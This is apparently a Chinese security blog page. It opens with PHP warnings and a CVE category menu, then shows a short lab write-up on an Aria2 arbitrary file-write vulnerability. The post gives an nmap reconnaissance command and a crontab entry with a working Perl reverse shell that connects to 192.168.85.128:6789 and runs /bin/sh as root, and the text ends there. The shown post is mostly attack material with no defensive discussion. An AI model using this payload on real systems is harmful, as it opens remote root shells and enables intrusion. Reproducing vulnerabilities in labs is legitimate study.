Warning: Undefined array key 6 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 6 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 16 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 16 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 42 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 42 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 58 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 58 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined variable $addMisc in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 336

Warning: Undefined array key 68 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 222

Warning: Undefined array key 95 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 222

[—]CVE漏洞库
- [+]PHP漏洞
  - [+]zzcms漏洞
  - [+]zabbix漏洞
  - [+]xampp漏洞
  - [+]VictorCMS漏洞
  - [+]ThinkPHP漏洞
  - [+]taocms漏洞
  - [+]SubrionCMS漏洞
  - [+]SQL注入漏洞
  - [+]phpmyadmin漏洞
  - [+]php漏洞
  - [+]nagiosxi漏洞
  - [+]Metinfo漏洞
  - [+]Joomla漏洞
  - [+]Hooskcms漏洞
  - [+]finecms漏洞
  - [+]empire漏洞
  - [+]Drupal漏洞
  - [+]Discuz漏洞
  - [+]dedecms漏洞
  - [+]Made Simple漏洞
  - [+]AtomCMS漏洞
  - [+]鸳鸯漏洞
  - [+]文件上传漏洞
  - [+]其他漏洞
  - [+]代码命令执行漏洞
- [+]java漏洞
  - [+]XStream漏洞
  - [+]weblogic漏洞
  - [+]Tomcat漏洞
  - [+]struts2漏洞
  - [+]spring漏洞
  - [+]Solr漏洞
  - [+]Shiro漏洞
  - [+]OfBiz漏洞
  - [+]Nexus漏洞
  - [+]Log4j漏洞
  - [+]Kylin漏洞
  - [+]Jetty漏洞
  - [+]Jenkins漏洞
  - [+]jboss漏洞
  - [+]ElasticSearch漏洞
  - [+]druid漏洞
  - [+]ColdFusion漏洞
  - [+]ActiveMQ漏洞
  - [+]斑鸠漏洞
  - [+]反序列化漏洞
  - [+]其他漏洞
  - [+]代码命令执行漏洞
- [—]中间件漏洞
  - [+]webmin漏洞
  - [+]SaltStack漏洞
  - [+]Redis漏洞
  - [+]Rails漏洞
  - [+]python漏洞
  - [+]postgresql漏洞
  - [+]node漏洞
  - [+]nginx漏洞
  - [+]mysql漏洞
  - [+]jquery漏洞
  - [+]Imagemagick漏洞
  - [+]httpd漏洞
  - [+]GitLab漏洞
  - [+]GhostScript漏洞
  - [+]fastjson漏洞
  - [+]Django漏洞
  - [+]Couchdb漏洞
  - [+]Atlassian漏洞
  - [+]APISIX漏洞
  - [+]Airflow漏洞
  - [+]成对漏洞
  - [+]命令代码执行漏洞
  - [—]其他漏洞
    
    (CVE-2023-42820)(Gitea 1.4目录穿越)
    
    (CVE-2022-24124)(CVE-2023-38633)
    
    (CVE-2021-43287)(CVE-2021-45788)
    
    (CVE-2021-3223)(CVE-2021-4034)
    
    (CVE-2019-15516)(CVE-2021-28073)
    
    (CVE-2018-7171)(CVE-2018-8715)
    
    (CVE-2018-11759)(CVE-2018-18778)
    
    (CVE-2016-5385)(CVE-2018-11409)
    
    (CVE-2011-0751)(CVE-2014-6271)
    
    (Aria2 文件写入)(Celery 反序列化)

30 6 月, 2024

(Aria2 文件写入)(Celery 反序列化)

Aria2 任意文件写入漏洞

信息收集：nmap 192.168.85.130 -p 6800 -A

注：在phpstuday中搭建web网站并添加如下内容到shell文件中

SHELL=/bin/sh           
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/1 * * * * root perl -e 'use Socket;$i="192.168.85.128";$p=6789;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'